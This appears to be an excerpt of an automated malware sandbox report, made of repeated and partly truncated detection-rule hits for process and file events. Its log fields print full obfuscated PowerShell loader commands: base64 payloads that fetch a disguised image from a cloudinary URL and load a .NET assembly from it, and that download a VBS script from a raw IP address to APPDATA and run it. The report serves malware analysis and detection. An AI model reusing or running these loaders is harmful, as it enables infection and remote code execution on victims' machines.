                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", ProcessId: 5092, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4824, TargetFilename: C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4824, TargetFilename: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", CommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteW